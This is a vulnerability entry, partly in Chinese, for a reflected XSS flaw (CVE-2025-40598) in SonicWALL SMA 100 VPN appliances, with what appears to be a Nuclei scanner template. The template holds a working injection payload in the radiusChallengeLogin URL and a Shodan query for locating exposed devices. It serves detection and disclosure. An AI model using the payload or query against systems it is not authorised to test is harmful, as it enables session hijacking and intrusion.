SonicWALL SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞信息
漏洞名称: SonicWALL SMA 100 Web Interface Cross Site Scripting Vulnerability
漏洞编号:
CVE: CVE-2025-40598
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: SonicWALL SMA 100系列是一款广泛使用的SSL VPN设备,为企业提供远程访问解决方案。该设备的Web界面存在一个反射型跨站脚本(XSS)漏洞,允许远程未认证攻击者可能执行任意JavaScript代码。此漏洞的根源在于Web界面未能正确过滤用户输入,特别是在处理radiusChallengeLogin页面的portalName和status参数时,攻击者可以通过构造恶意的URL,注入JavaScript代码。当其他用户访问这个恶意URL时,注入的代码将在用户的浏览器中执行,可能导致会话劫持、敏感信息泄露或其他恶意操作。由于攻击者需要诱使用户访问特制的链接,这种漏洞的利用需要一定的用户交互,但一旦成功利用,攻击者可以绕过同源策略,执行跨站脚本攻击。
info: name:SonicWALL SMA 100 - Web Interface Cross Site Scripting author:watchtowr,DhiyaneshDK severity:medium description:| A Reflected cross-site scripting (XSS) vulnerability exists in the SMA100 series web interface, allowing a remote unauthenticated attacker to potentially execute arbitrary JavaScript code. reference: -https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012 -https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/ metadata: max-request:1 shodan-query:product:"SonicWALL SSL VPN http proxy" tags:cve,cve2025,xss,cgi-bin,sonicwall,sma100,sslvpn
http: -method: GET path: -"{{BaseURL}}/cgi-bin/radiusChallengeLogin?portalName=portal1&status=needchallenge&state=\"><img/src=x+onerror=alert`1`>"
matchers-condition:and matchers: -type: word part:body words: -'"><img/src=x+onerror=alert`1`>' -'SMA' condition:and